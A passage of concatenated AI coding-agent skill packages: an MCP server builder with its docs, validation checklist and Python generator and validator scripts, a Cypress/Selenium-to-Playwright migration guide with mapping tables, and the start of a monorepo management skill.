- Unit: validate transformation from OpenAPI operation to MCP tool schema.
- Contract: snapshot `tool_manifest.json` and review diffs in PR.
- Integration: call generated tool handlers against staging API.
- Resilience: simulate 4xx/5xx upstream errors and verify structured responses.
## Deployment Practices
- Pin MCP runtime dependencies per environment.
- Roll out server updates behind versioned endpoint/process.
- Keep backward compatibility for one release window minimum.
- Add changelog notes for new/removed/changed tool contracts.
## Security Controls
- Keep outbound host allowlist explicit.
- Do not proxy arbitrary URLs from user-provided input.
- Redact secrets and auth headers from logs.
- Rate-limit high-cost tools and add request timeouts.
FILE:README.md
# MCP Server Builder
Generate and validate MCP servers from OpenAPI contracts with production-focused tooling. This skill helps teams bootstrap fast and enforce schema quality before shipping.
## Quick Start
```bash
# Generate scaffold from OpenAPI
python3 scripts/openapi_to_mcp.py \
--input openapi.json \
--server-name my-mcp \
--language python \
--output-dir ./generated \
--format text
# Validate generated manifest
python3 scripts/mcp_validator.py --input generated/tool_manifest.json --strict --format text
```
## Included Tools
- `scripts/openapi_to_mcp.py`: OpenAPI -> `tool_manifest.json` + starter server scaffold
- `scripts/mcp_validator.py`: structural and quality validation for MCP tool definitions
## References
- `references/openapi-extraction-guide.md`
- `references/python-server-template.md`
- `references/typescript-server-template.md`
- `references/validation-checklist.md`
## Installation
### Claude Code
```bash
cp -R engineering/mcp-server-builder ~/.claude/skills/mcp-server-builder
```
### OpenAI Codex
```bash
cp -R engineering/mcp-server-builder ~/.codex/skills/mcp-server-builder
```
### OpenClaw
```bash
cp -R engineering/mcp-server-builder ~/.openclaw/skills/mcp-server-builder
```
FILE:references/openapi-extraction-guide.md
# OpenAPI Extraction Guide
## Goal
Turn stable API operations into stable MCP tools with clear names and reliable schemas.
## Extraction Rules
1. Prefer `operationId` as tool name.
2. Fallback naming: `<method>_<path>` sanitized to snake_case.
3. Pull `summary` for tool description; fallback to `description`.
4. Merge path/query parameters into `inputSchema.properties`.
5. Merge `application/json` request-body object properties when available.
6. Preserve required fields from both parameters and request body.
## Naming Guidance
Good names:
- `list_customers`
- `create_invoice`
- `archive_project`
Avoid:
- `tool1`
- `run`
- `get__v1__customer___id`
## Schema Guidance
- `inputSchema.type` must be `object`.
- Every `required` key must exist in `properties`.
- Include concise descriptions on high-risk fields (IDs, dates, money, destructive flags).
FILE:references/python-server-template.md
# Python MCP Server Template
```python
from fastmcp import FastMCP
import httpx
import os
mcp = FastMCP(name="my-server")
API_BASE = os.environ["API_BASE"]
API_TOKEN = os.environ["API_TOKEN"]
@mcp.tool()
def list_items(input: dict) -> dict:
with httpx.Client(base_url=API_BASE, headers={"Authorization": f"Bearer {API_TOKEN}"}) as client:
resp = client.get("/items", params=input)
if resp.status_code >= 400:
return {"error": {"code": "upstream_error", "message": "List failed", "details": resp.text}}
return resp.json()
if __name__ == "__main__":
mcp.run()
```
FILE:references/typescript-server-template.md
# TypeScript MCP Server Template
```ts
import { FastMCP } from "fastmcp";
const server = new FastMCP({ name: "my-server" });
server.tool(
"list_items",
"List items from upstream service",
async (input) => {
return {
content: [{ type: "text", text: JSON.stringify({ status: "todo", input }) }],
};
}
);
server.run();
```
FILE:references/validation-checklist.md
# MCP Validation Checklist
## Structural Integrity
- [ ] Tool names are unique across the manifest
- [ ] Tool names use lowercase snake_case (3-64 chars, `[a-z0-9_]`)
- [ ] `inputSchema.type` is always `"object"`
- [ ] Every `required` field exists in `properties`
- [ ] No empty `properties` objects (warn if inputs truly optional)
## Descriptive Quality
- [ ] All tools include actionable descriptions (≥10 chars)
- [ ] Descriptions start with a verb ("Create…", "Retrieve…", "Delete…")
- [ ] Parameter descriptions explain expected values, not just types
## Security & Safety
- [ ] Auth tokens and secrets are NOT exposed in tool schemas
- [ ] Destructive tools require explicit confirmation input parameters
- [ ] No tool accepts arbitrary URLs or file paths without validation
- [ ] Outbound host allowlists are explicit where applicable
## Versioning & Compatibility
- [ ] Breaking tool changes use new tool IDs (never rename in-place)
- [ ] Additive-only changes for non-breaking updates
- [ ] Contract changelog is maintained per release
- [ ] Deprecated tools include sunset timeline in description
## Runtime & Error Handling
- [ ] Error responses use consistent structure (`code`, `message`, `details`)
- [ ] Timeout and rate-limit behaviors are documented
- [ ] Large response payloads are paginated or truncated
FILE:scripts/mcp_validator.py
#!/usr/bin/env python3
"""Validate MCP tool manifest files for common contract issues.
Input sources:
- --input <manifest.json>
- stdin JSON
Validation domains:
- structural correctness
- naming hygiene
- schema consistency
- descriptive completeness
"""
import argparse
import json
import re
import sys
from dataclasses import dataclass, asdict
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
TOOL_NAME_RE = re.compile(r"^[a-z0-9_]{3,64}$")
class CLIError(Exception):
"""Raised for expected CLI failures."""
@dataclass
class ValidationResult:
errors: List[str]
warnings: List[str]
tool_count: int
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Validate MCP tool definitions.")
parser.add_argument("--input", help="Path to manifest JSON file. If omitted, reads from stdin.")
parser.add_argument("--strict", action="store_true", help="Exit non-zero when errors are found.")
parser.add_argument("--format", choices=["text", "json"], default="text", help="Output format.")
return parser.parse_args()
def load_manifest(input_path: Optional[str]) -> Dict[str, Any]:
if input_path:
try:
data = Path(input_path).read_text(encoding="utf-8")
except Exception as exc:
raise CLIError(f"Failed reading --input: {exc}") from exc
else:
if sys.stdin.isatty():
raise CLIError("No input provided. Use --input or pipe manifest JSON via stdin.")
data = sys.stdin.read().strip()
if not data:
raise CLIError("Empty stdin.")
try:
payload = json.loads(data)
except json.JSONDecodeError as exc:
raise CLIError(f"Invalid JSON input: {exc}") from exc
if not isinstance(payload, dict):
raise CLIError("Manifest root must be a JSON object.")
return payload
def validate_schema(tool_name: str, schema: Dict[str, Any]) -> Tuple[List[str], List[str]]:
errors: List[str] = []
warnings: List[str] = []
if schema.get("type") != "object":
errors.append(f"{tool_name}: inputSchema.type must be 'object'.")
props = schema.get("properties", {})
if not isinstance(props, dict):
errors.append(f"{tool_name}: inputSchema.properties must be an object.")
props = {}
required = schema.get("required", [])
if not isinstance(required, list):
errors.append(f"{tool_name}: inputSchema.required must be an array.")
required = []
prop_keys = set(props.keys())
for req in required:
if req not in prop_keys:
errors.append(f"{tool_name}: required field '{req}' is not defined in properties.")
if not props:
warnings.append(f"{tool_name}: no input properties declared.")
for pname, pdef in props.items():
if not isinstance(pdef, dict):
errors.append(f"{tool_name}: property '{pname}' must be an object.")
continue
ptype = pdef.get("type")
if not ptype:
warnings.append(f"{tool_name}: property '{pname}' has no explicit type.")
return errors, warnings
def validate_manifest(payload: Dict[str, Any]) -> ValidationResult:
errors: List[str] = []
warnings: List[str] = []
tools = payload.get("tools")
if not isinstance(tools, list):
raise CLIError("Manifest must include a 'tools' array.")
seen_names = set()
for idx, tool in enumerate(tools):
if not isinstance(tool, dict):
errors.append(f"tool[{idx}] is not an object.")
continue
name = str(tool.get("name", "")).strip()
desc = str(tool.get("description", "")).strip()
schema = tool.get("inputSchema")
if not name:
errors.append(f"tool[{idx}] missing name.")
continue
if name in seen_names:
errors.append(f"duplicate tool name: {name}")
seen_names.add(name)
if not TOOL_NAME_RE.match(name):
warnings.append(
f"{name}: non-standard naming; prefer lowercase snake_case (3-64 chars, [a-z0-9_])."
)
if len(desc) < 10:
warnings.append(f"{name}: description too short; provide actionable purpose.")
if not isinstance(schema, dict):
errors.append(f"{name}: missing or invalid inputSchema object.")
continue
schema_errors, schema_warnings = validate_schema(name, schema)
errors.extend(schema_errors)
warnings.extend(schema_warnings)
return ValidationResult(errors=errors, warnings=warnings, tool_count=len(tools))
def to_text(result: ValidationResult) -> str:
lines = [
"MCP manifest validation",
f"- tools: {result.tool_count}",
f"- errors: {len(result.errors)}",
f"- warnings: {len(result.warnings)}",
]
if result.errors:
lines.append("Errors:")
lines.extend([f"- {item}" for item in result.errors])
if result.warnings:
lines.append("Warnings:")
lines.extend([f"- {item}" for item in result.warnings])
return "\n".join(lines)
def main() -> int:
args = parse_args()
payload = load_manifest(args.input)
result = validate_manifest(payload)
if args.format == "json":
print(json.dumps(asdict(result), indent=2))
else:
print(to_text(result))
if args.strict and result.errors:
return 1
return 0
if __name__ == "__main__":
try:
raise SystemExit(main())
except CLIError as exc:
print(f"ERROR: {exc}", file=sys.stderr)
raise SystemExit(2)
FILE:scripts/openapi_to_mcp.py
#!/usr/bin/env python3
"""Generate MCP scaffold files from an OpenAPI specification.
Input sources:
- --input <file>
- stdin (JSON or YAML when PyYAML is available)
Output:
- tool_manifest.json
- server.py or server.ts scaffold
- summary in text/json
"""
import argparse
import json
import re
import sys
from dataclasses import dataclass, asdict
from pathlib import Path
from typing import Any, Dict, List, Optional
HTTP_METHODS = {"get", "post", "put", "patch", "delete"}
class CLIError(Exception):
"""Raised for expected CLI failures."""
@dataclass
class GenerationSummary:
server_name: str
language: str
operations_total: int
tools_generated: int
output_dir: str
manifest_path: str
scaffold_path: str
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(description="Generate MCP server scaffold from OpenAPI.")
parser.add_argument("--input", help="OpenAPI file path (JSON or YAML). If omitted, reads from stdin.")
parser.add_argument("--server-name", required=True, help="MCP server name.")
parser.add_argument("--language", choices=["python", "typescript"], default="python", help="Scaffold language.")
parser.add_argument("--output-dir", default=".", help="Directory to write generated files.")
parser.add_argument("--format", choices=["text", "json"], default="text", help="Output format.")
return parser.parse_args()
def load_raw_input(input_path: Optional[str]) -> str:
if input_path:
try:
return Path(input_path).read_text(encoding="utf-8")
except Exception as exc:
raise CLIError(f"Failed to read --input file: {exc}") from exc
if sys.stdin.isatty():
raise CLIError("No input provided. Use --input <spec-file> or pipe OpenAPI via stdin.")
data = sys.stdin.read().strip()
if not data:
raise CLIError("Stdin was provided but empty.")
return data
def parse_openapi(raw: str) -> Dict[str, Any]:
try:
return json.loads(raw)
except json.JSONDecodeError:
try:
import yaml # type: ignore
parsed = yaml.safe_load(raw)
if not isinstance(parsed, dict):
raise CLIError("YAML OpenAPI did not parse into an object.")
return parsed
except ImportError as exc:
raise CLIError("Input is not valid JSON and PyYAML is unavailable for YAML parsing.") from exc
except Exception as exc:
raise CLIError(f"Failed to parse OpenAPI input: {exc}") from exc
def sanitize_tool_name(name: str) -> str:
cleaned = re.sub(r"[^a-zA-Z0-9_]+", "_", name).strip("_")
cleaned = re.sub(r"_+", "_", cleaned)
return cleaned.lower() or "unnamed_tool"
def schema_from_parameter(param: Dict[str, Any]) -> Dict[str, Any]:
schema = param.get("schema", {})
if not isinstance(schema, dict):
schema = {}
out = {
"type": schema.get("type", "string"),
"description": param.get("description", ""),
}
if "enum" in schema:
out["enum"] = schema["enum"]
return out
def extract_tools(spec: Dict[str, Any]) -> List[Dict[str, Any]]:
paths = spec.get("paths", {})
if not isinstance(paths, dict):
raise CLIError("OpenAPI spec missing valid 'paths' object.")
tools = []
for path, methods in paths.items():
if not isinstance(methods, dict):
continue
for method, operation in methods.items():
method_l = str(method).lower()
if method_l not in HTTP_METHODS or not isinstance(operation, dict):
continue
op_id = operation.get("operationId")
if op_id:
name = sanitize_tool_name(str(op_id))
else:
name = sanitize_tool_name(f"{method_l}_{path}")
description = str(operation.get("summary") or operation.get("description") or f"{method_l.upper()} {path}")
properties: Dict[str, Any] = {}
required: List[str] = []
for param in operation.get("parameters", []):
if not isinstance(param, dict):
continue
pname = str(param.get("name", "")).strip()
if not pname:
continue
properties[pname] = schema_from_parameter(param)
if bool(param.get("required")):
required.append(pname)
request_body = operation.get("requestBody", {})
if isinstance(request_body, dict):
content = request_body.get("content", {})
if isinstance(content, dict):
app_json = content.get("application/json", {})
if isinstance(app_json, dict):
schema = app_json.get("schema", {})
if isinstance(schema, dict) and schema.get("type") == "object":
rb_props = schema.get("properties", {})
if isinstance(rb_props, dict):
for key, val in rb_props.items():
if isinstance(val, dict):
properties[key] = val
rb_required = schema.get("required", [])
if isinstance(rb_required, list):
required.extend([str(x) for x in rb_required])
tool = {
"name": name,
"description": description,
"inputSchema": {
"type": "object",
"properties": properties,
"required": sorted(set(required)),
},
"x-openapi": {"path": path, "method": method_l},
}
tools.append(tool)
return tools
def python_scaffold(server_name: str, tools: List[Dict[str, Any]]) -> str:
handlers = []
for tool in tools:
fname = sanitize_tool_name(tool["name"])
handlers.append(
f"@mcp.tool()\ndef {fname}(input: dict) -> dict:\n"
f" \"\"\"{tool['description']}\"\"\"\n"
f" return {{\"tool\": \"{tool['name']}\", \"status\": \"todo\", \"input\": input}}\n"
)
return "\n".join(
[
"#!/usr/bin/env python3",
'"""Generated MCP server scaffold."""',
"",
"from fastmcp import FastMCP",
"",
f"mcp = FastMCP(name={server_name!r})",
"",
*handlers,
"",
"if __name__ == '__main__':",
" mcp.run()",
"",
]
)
def typescript_scaffold(server_name: str, tools: List[Dict[str, Any]]) -> str:
registrations = []
for tool in tools:
const_name = sanitize_tool_name(tool["name"])
registrations.append(
"server.tool(\n"
f" '{tool['name']}',\n"
f" '{tool['description']}',\n"
" async (input) => ({\n"
f" content: [{{ type: 'text', text: JSON.stringify({{ tool: '{const_name}', status: 'todo', input }}) }}],\n"
" })\n"
");"
)
return "\n".join(
[
"// Generated MCP server scaffold",
"import { FastMCP } from 'fastmcp';",
"",
f"const server = new FastMCP({{ name: '{server_name}' }});",
"",
*registrations,
"",
"server.run();",
"",
]
)
def write_outputs(server_name: str, language: str, output_dir: Path, tools: List[Dict[str, Any]]) -> GenerationSummary:
output_dir.mkdir(parents=True, exist_ok=True)
manifest_path = output_dir / "tool_manifest.json"
manifest = {"server": server_name, "tools": tools}
manifest_path.write_text(json.dumps(manifest, indent=2), encoding="utf-8")
if language == "python":
scaffold_path = output_dir / "server.py"
scaffold_path.write_text(python_scaffold(server_name, tools), encoding="utf-8")
else:
scaffold_path = output_dir / "server.ts"
scaffold_path.write_text(typescript_scaffold(server_name, tools), encoding="utf-8")
return GenerationSummary(
server_name=server_name,
language=language,
operations_total=len(tools),
tools_generated=len(tools),
output_dir=str(output_dir.resolve()),
manifest_path=str(manifest_path.resolve()),
scaffold_path=str(scaffold_path.resolve()),
)
def main() -> int:
args = parse_args()
raw = load_raw_input(args.input)
spec = parse_openapi(raw)
tools = extract_tools(spec)
if not tools:
raise CLIError("No operations discovered in OpenAPI paths.")
summary = write_outputs(
server_name=args.server_name,
language=args.language,
output_dir=Path(args.output_dir),
tools=tools,
)
if args.format == "json":
print(json.dumps(asdict(summary), indent=2))
else:
print("MCP scaffold generated")
print(f"- server: {summary.server_name}")
print(f"- language: {summary.language}")
print(f"- tools: {summary.tools_generated}")
print(f"- manifest: {summary.manifest_path}")
print(f"- scaffold: {summary.scaffold_path}")
return 0
if __name__ == "__main__":
try:
raise SystemExit(main())
except CLIError as exc:
print(f"ERROR: {exc}", file=sys.stderr)
raise SystemExit(2)
Chuyển bộ test từ Cypress hoặc Selenium sang Playwright.
---
name: "migrate"
description: >-
Migrate from Cypress or Selenium to Playwright. Use when user mentions
"cypress", "selenium", "migrate tests", "convert tests", "switch to
playwright", "move from cypress", or "replace selenium".
---
# Migrate to Playwright
Interactive migration from Cypress or Selenium to Playwright with file-by-file conversion.
## Input
`$ARGUMENTS` can be:
- `"from cypress"` — migrate Cypress test suite
- `"from selenium"` — migrate Selenium/WebDriver tests
- A file path: convert a specific test file
- Empty: auto-detect source framework
## Steps
### 1. Detect Source Framework
Use `Explore` subagent to scan:
- `cypress/` directory or `cypress.config.ts` → Cypress
- `selenium`, `webdriver` in `package.json` deps → Selenium
- `.py` test files with `selenium` imports → Selenium (Python)
### 2. Assess Migration Scope
Count files and categorize:
```
Migration Assessment:
- Total test files: X
- Cypress custom commands: Y
- Cypress fixtures: Z
- Estimated effort: [small|medium|large]
```
| Size | Files | Approach |
|---|---|---|
| Small (1-10) | Convert sequentially | Direct conversion |
| Medium (11-30) | Batch in groups of 5 | Use sub-agents |
| Large (31+) | Use `/batch` | Parallel conversion with `/batch` |
### 3. Set Up Playwright (If Not Present)
Run `/pw:init` first if Playwright isn't configured.
### 4. Convert Files
For each file, apply the appropriate mapping:
#### Cypress → Playwright
Load `cypress-mapping.md` for complete reference.
Key translations:
```
cy.visit(url) → page.goto(url)
cy.get(selector) → page.locator(selector) or page.getByRole(...)
cy.contains(text) → page.getByText(text)
cy.find(selector) → locator.locator(selector)
cy.click() → locator.click()
cy.type(text) → locator.fill(text)
cy.should('be.visible') → expect(locator).toBeVisible()
cy.should('have.text') → expect(locator).toHaveText(text)
cy.intercept() → page.route()
cy.wait('@alias') → page.waitForResponse()
cy.fixture() → JSON import or test data file
```
**Cypress custom commands** → Playwright fixtures or helper functions
**Cypress plugins** → Playwright config or fixtures
**`before`/`beforeEach`** → `test.beforeAll()` / `test.beforeEach()`
#### Selenium → Playwright
Load `selenium-mapping.md` for complete reference.
Key translations:
```
driver.get(url) → page.goto(url)
driver.findElement(By.id('x')) → page.locator('#x') or page.getByTestId('x')
driver.findElement(By.css('.x')) → page.locator('.x') or page.getByRole(...)
element.click() → locator.click()
element.sendKeys(text) → locator.fill(text)
element.getText() → locator.textContent()
WebDriverWait + ExpectedConditions → expect(locator).toBeVisible()
driver.switchTo().frame() → page.frameLocator()
Actions → locator.hover(), locator.dragTo()
```
### 5. Upgrade Locators
During conversion, upgrade selectors to Playwright best practices:
- `#id` → `getByTestId()` or `getByRole()`
- `.class` → `getByRole()` or `getByText()`
- `[data-testid]` → `getByTestId()`
- XPath → role-based locators
### 6. Convert Custom Commands / Utilities
- Cypress custom commands → Playwright custom fixtures via `test.extend()`
- Selenium page objects → Playwright page objects (keep structure, update API)
- Shared helpers → TypeScript utility functions
### 7. Verify Each Converted File
After converting each file:
```bash
npx playwright test <converted-file> --reporter=list
```
Fix any compilation or runtime errors before moving to the next file.
### 8. Clean Up
After all files are converted:
- Remove Cypress/Selenium dependencies from `package.json`
- Remove old config files (`cypress.config.ts`, etc.)
- Update CI workflow to use Playwright
- Update README with new test commands
Ask user before deleting anything.
## Output
- Conversion summary: files converted, total tests migrated
- Any tests that couldn't be auto-converted (manual intervention needed)
- Updated CI config
- Before/after comparison of test run results
FILE:cypress-mapping.md
# Cypress → Playwright Mapping
## Commands
| Cypress | Playwright | Notes |
|---|---|---|
| `cy.visit('/page')` | `await page.goto('/page')` | Use `baseURL` in config |
| `cy.get('.selector')` | `page.locator('.selector')` | Prefer `getByRole()` |
| `cy.get('[data-cy=x]')` | `page.getByTestId('x')` | |
| `cy.contains('text')` | `page.getByText('text')` | |
| `cy.find('.child')` | `parent.locator('.child')` | Chain from parent locator |
| `cy.first()` | `locator.first()` | |
| `cy.last()` | `locator.last()` | |
| `cy.eq(n)` | `locator.nth(n)` | |
| `cy.parent()` | `locator.locator('..')` | Or restructure with better locators |
| `cy.children()` | `locator.locator('> *')` | |
| `cy.siblings()` | Not direct — restructure test | Use parent + filter |
## Actions
| Cypress | Playwright | Notes |
|---|---|---|
| `.click()` | `await locator.click()` | Always `await` |
| `.dblclick()` | `await locator.dblclick()` | |
| `.rightclick()` | `await locator.click({ button: 'right' })` | |
| `.type('text')` | `await locator.fill('text')` | `fill()` clears first |
| `.type('text', { delay: 50 })` | `await locator.pressSequentially('text', { delay: 50 })` | Simulates typing |
| `.clear()` | `await locator.clear()` | |
| `.check()` | `await locator.check()` | |
| `.uncheck()` | `await locator.uncheck()` | |
| `.select('value')` | `await locator.selectOption('value')` | |
| `.scrollTo()` | `await locator.scrollIntoViewIfNeeded()` | |
| `.trigger('event')` | `await locator.dispatchEvent('event')` | |
| `.focus()` | `await locator.focus()` | |
| `.blur()` | `await locator.blur()` | |
## Assertions
| Cypress | Playwright | Notes |
|---|---|---|
| `.should('be.visible')` | `await expect(locator).toBeVisible()` | Web-first, auto-retry |
| `.should('not.exist')` | `await expect(locator).not.toBeVisible()` | Or `.toHaveCount(0)` |
| `.should('have.text', 'x')` | `await expect(locator).toHaveText('x')` | |
| `.should('contain', 'x')` | `await expect(locator).toContainText('x')` | |
| `.should('have.value', 'x')` | `await expect(locator).toHaveValue('x')` | |
| `.should('have.attr', 'x', 'y')` | `await expect(locator).toHaveAttribute('x', 'y')` | |
| `.should('have.class', 'x')` | `await expect(locator).toHaveClass(/x/)` | |
| `.should('be.disabled')` | `await expect(locator).toBeDisabled()` | |
| `.should('be.checked')` | `await expect(locator).toBeChecked()` | |
| `.should('have.length', n)` | `await expect(locator).toHaveCount(n)` | |
| `cy.url().should('include', '/x')` | `await expect(page).toHaveURL(/\/x/)` | |
| `cy.title().should('eq', 'x')` | `await expect(page).toHaveTitle('x')` | |
## Network
| Cypress | Playwright |
|---|---|
| `cy.intercept('GET', '/api/*', { body: data })` | `await page.route('**/api/*', route => route.fulfill({ body: JSON.stringify(data) }))` |
| `cy.intercept('POST', '/api/*').as('save')` | `const savePromise = page.waitForResponse('**/api/*')` |
| `cy.wait('@save')` | `await savePromise` |
## Fixtures & Custom Commands
| Cypress | Playwright |
|---|---|
| `cy.fixture('data.json')` | `import data from './test-data/data.json'` |
| `Cypress.Commands.add('login', ...)` | `test.extend({ authenticatedPage: ... })` |
| `beforeEach(() => { ... })` | `test.beforeEach(async ({ page }) => { ... })` |
| `before(() => { ... })` | `test.beforeAll(async () => { ... })` |
## Config
| Cypress | Playwright |
|---|---|
| `baseUrl` in `cypress.config.ts` | `use.baseURL` in `playwright.config.ts` |
| `defaultCommandTimeout` | `expect.timeout` or `use.actionTimeout` |
| `video: true` | `use.video: 'on'` |
| `screenshotOnRunFailure` | `use.screenshot: 'only-on-failure'` |
| `retries: { runMode: 2 }` | `retries: 2` |
FILE:selenium-mapping.md
# Selenium → Playwright Mapping
## Driver Setup
| Selenium (JS) | Playwright |
|---|---|
| `new Builder().forBrowser('chrome').build()` | Handled by config — no driver setup |
| `driver.quit()` | Automatic — Playwright manages browser lifecycle |
| `driver.manage().setTimeouts(...)` | Config: `timeout`, `expect.timeout` |
## Navigation
| Selenium | Playwright | Notes |
|---|---|---|
| `driver.get(url)` | `await page.goto(url)` | Use `baseURL` |
| `driver.navigate().back()` | `await page.goBack()` | |
| `driver.navigate().forward()` | `await page.goForward()` | |
| `driver.navigate().refresh()` | `await page.reload()` | |
| `driver.getCurrentUrl()` | `page.url()` | |
| `driver.getTitle()` | `await page.title()` | |
## Element Location
| Selenium | Playwright | Preferred |
|---|---|---|
| `By.id('x')` | `page.locator('#x')` | `page.getByTestId('x')` |
| `By.css('.x')` | `page.locator('.x')` | `page.getByRole(...)` |
| `By.xpath('//div')` | `page.locator('xpath=//div')` | Avoid — use role-based |
| `By.name('x')` | `page.locator('[name=x]')` | `page.getByLabel(...)` |
| `By.linkText('x')` | `page.getByRole('link', { name: 'x' })` | ✅ Best practice |
| `By.partialLinkText('x')` | `page.getByRole('link', { name: /x/ })` | ✅ Best practice |
| `By.tagName('button')` | `page.getByRole('button')` | ✅ Best practice |
| `By.className('x')` | `page.locator('.x')` | `page.getByRole(...)` |
| `findElement()` | Returns first match | `locator.first()` |
| `findElements()` | `page.locator(selector)` | Use `.count()` or `.all()` |
## Actions
| Selenium | Playwright |
|---|---|
| `element.click()` | `await locator.click()` |
| `element.sendKeys('text')` | `await locator.fill('text')` |
| `element.sendKeys(Key.ENTER)` | `await locator.press('Enter')` |
| `element.clear()` | `await locator.clear()` |
| `element.submit()` | `await locator.press('Enter')` or click submit button |
| `element.getText()` | `await locator.textContent()` |
| `element.getAttribute('x')` | `await locator.getAttribute('x')` |
| `element.isDisplayed()` | `await locator.isVisible()` |
| `element.isEnabled()` | `await locator.isEnabled()` |
| `element.isSelected()` | `await locator.isChecked()` |
## Waits
| Selenium | Playwright | Notes |
|---|---|---|
| `WebDriverWait(driver, 10).until(EC.visibilityOf(el))` | `await expect(locator).toBeVisible()` | Auto-retries |
| `WebDriverWait(driver, 10).until(EC.elementToBeClickable(el))` | `await locator.click()` | Auto-waits for clickable |
| `WebDriverWait(driver, 10).until(EC.presenceOf(el))` | `await expect(locator).toBeAttached()` | |
| `WebDriverWait(driver, 10).until(EC.textToBe(el, 'x'))` | `await expect(locator).toHaveText('x')` | |
| `Thread.sleep(3000)` | ❌ Never use | Use assertions instead |
| `driver.manage().setTimeouts({ implicit: 10000 })` | Not needed | Playwright auto-waits |
## Advanced
| Selenium | Playwright |
|---|---|
| `Actions(driver).moveToElement(el).perform()` | `await locator.hover()` |
| `Actions(driver).dragAndDrop(src, tgt).perform()` | `await src.dragTo(tgt)` |
| `Actions(driver).doubleClick(el).perform()` | `await locator.dblclick()` |
| `Actions(driver).contextClick(el).perform()` | `await locator.click({ button: 'right' })` |
| `driver.switchTo().frame(el)` | `page.frameLocator('#frame')` |
| `driver.switchTo().defaultContent()` | Not needed — use `page` directly |
| `driver.switchTo().alert()` | `page.on('dialog', d => d.accept())` |
| `driver.switchTo().window(handle)` | `const popup = await page.waitForEvent('popup')` |
| `driver.executeScript(js)` | `await page.evaluate(js)` |
| `driver.takeScreenshot()` | `await page.screenshot({ path: 'x.png' })` |
## Test Structure
| Selenium (Jest/Mocha) | Playwright |
|---|---|
| `describe('Suite', () => { ... })` | `test.describe('Suite', () => { ... })` |
| `it('should...', () => { ... })` | `test('should...', async ({ page }) => { ... })` |
| `beforeAll(() => { ... })` | `test.beforeAll(async () => { ... })` |
| `beforeEach(() => { ... })` | `test.beforeEach(async ({ page }) => { ... })` |
| `afterEach(() => { ... })` | `test.afterEach(async ({ page }) => { ... })` |
## Key Differences
1. **No implicit waits** — Playwright auto-waits for actionability
2. **No driver management** — Playwright handles browser lifecycle
3. **Built-in assertions** — `expect(locator)` with auto-retry
4. **Parallel by default** — tests run in parallel, must be isolated
5. **Traces instead of screenshots** — richer debugging artifacts
Quản lý và tối ưu monorepo với Turborepo, Nx, pnpm workspaces, Lerna: phân tích tác động chéo gói, build/test chọn lọc, cache và chuyển từ multi-repo.
---
name: "monorepo-navigator"
description: "Navigate, manage, and optimize monorepos. Covers Turborepo, Nx, pnpm workspaces, and Lerna. Cross-package impact analysis, selective builds/tests on affected packages, remote caching, dependency graph visualization, and structured multi-repo to monorepo migrations. Use when setting up a new monorepo, optimizing CI for a large workspace, debugging cross-package dependency issues, or planning a multi-repo consolidation."
---
# Monorepo Navigator
**Tier:** POWERFUL
**Category:** Engineering
**Domain:** Monorepo Architecture / Build Systems
---
## Overview
Navigate, manage, and optimize monorepos. Covers Turborepo, Nx, pnpm workspaces, and Lerna. Enables cross-package impact analysis, selective builds/tests on affected packages only, remote caching, dependency graph visualization, and structured migrations from multi-repo to monorepo. Includes Claude Code configuration for workspace-aware development.
---
## Core Capabilities
- **Cross-package impact analysis** — determine which apps break when a shared package changes
- **Selective commands** — run tests/builds only for affected packages (not everything)
- **Dependency graph** — visualize package relationships as Mermaid diagrams
- **Build optimization** — remote caching, incremental builds, parallel execution
- **Migration** — step-by-step multi-repo → monorepo with zero history loss
- **Publishing** — changesets for versioning, pre-release channels, npm publish workflows
- **Claude Code config** — workspace-aware CLAUDE.md with per-package instructions
---
## When to Use
Use when:
- Multiple packages/apps share code (UI components, utils, types, API clients)
- Build times are slow because everything rebuilds when anything changes
- Migrating from multiple repos to a single repo
- Need to publish packages to npm with coordinated versioning
- Teams work across multiple packages and need unified tooling
Skip when:
- Single-app project with no shared packages
- Team/project boundaries are completely isolated (polyrepo is fine)
- Shared code is minimal and copy-paste overhead is acceptable
---
## Tool Selection
| Tool | Best For | Key Feature |
|---|---|---|
| **Turborepo** | JS/TS monorepos, simple pipeline config | Best-in-class remote caching, minimal config |
| **Nx** | Large enterprises, plugin ecosystem | Project graph, code generation, affected commands |
| **pnpm workspaces** | Workspace protocol, disk efficiency | `workspace:*` for local package refs |
| **Lerna** | npm publishing, versioning | Batch publishing, conventional commits |
| **Changesets** | Modern versioning (preferred over Lerna) | Changelog generation, pre-release channels |
Most modern setups: **pnpm workspaces + Turborepo + Changesets**
---
## Turborepo
→ See references/monorepo-tooling-reference.md for details
## Workspace Analyzer
```bash
python3 scripts/monorepo_analyzer.py /path/to/monorepo
python3 scripts/monorepo_analyzer.py /path/to/monorepo --json
```
Also see `references/monorepo-patterns.md` for common architecture and CI patterns.
## Common Pitfalls
| Pitfall | Fix |
|---|---|
| Running `turbo run build` without `--filter` on every PR | Always use `--filter=...[origin/main]` in CI |
| `workspace:*` refs cause publish failures | Use `pnpm changeset publish` — it replaces `workspace:*` with real versions automatically |
| All packages rebuild when unrelated file changes | Tune `inputs` in turbo.json to exclude docs, config files from cache keys |
| Shared tsconfig causes one package to break all type-checks | Use `extends` properly — each package extends root but overrides `rootDir` / `outDir` |
| git history lost during migration | Use `git filter-repo --to-subdirectory-filter` before merging — never move files manually |
| Remote cache not working in CI | Check TURBO_TOKEN and TURBO_TEAM env vars; verify with `turbo run build --summarize` |
| CLAUDE.md too generic — Claude modifies wrong package | Add explicit "When working on X, only touch files in apps/X" rules per package CLAUDE.md |
---
## Best Practices
1. **Root CLAUDE.md defines the map** — document every package, its purpose, and dependency rules
2. **Per-package CLAUDE.md defines the rules** — what's allowed, what's forbidden, testing commands
3. **Always scope commands with --filter** — running everything on every change defeats the purpose
4. **Remote cache is not optional** — without it, monorepo CI is slower than multi-repo CI
5. **Changesets over manual versioning** — never hand-edit package.json versions in a monorepo
6. **Shared configs in root, extended in packages** — tsconfig.base.json, .eslintrc.base.js, jest.base.config.js
7. **Impact analysis before merging shared package changes** — run affected check, communicate blast radius
8. **Keep packages/types as pure TypeScript** — no runtime code, no dependencies, fast to build and type-check
FILE:references/monorepo-patterns.md
# Monorepo Patterns
## Common Layouts
### apps + packages
- `apps/*`: deployable applications
- `packages/*`: shared libraries, UI kits, utilities
- `tooling/*`: lint/build config packages
### domains + shared
- `domains/*`: bounded-context product areas
- `shared/*`: cross-domain code with strict API contracts
### service monorepo
- `services/*`: backend services
- `libs/*`: shared service contracts and SDKs
## Dependency Rules
